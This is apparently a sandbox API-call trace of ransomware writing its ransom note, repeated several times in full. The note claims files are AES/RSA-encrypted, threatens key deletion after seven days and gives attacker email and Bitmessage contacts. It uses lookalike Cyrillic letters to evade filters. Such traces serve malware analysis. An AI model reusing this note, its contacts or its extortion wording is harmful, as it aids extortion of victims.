\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.197] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.197] CloseHandle (hObject=0x2ec) returned 1 [0291.198] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\#readme_eman#.rtf")) returned 0xffffffff [0291.198] GetLastError () returned 0x2 [0291.198] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.198] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.198] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.198] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 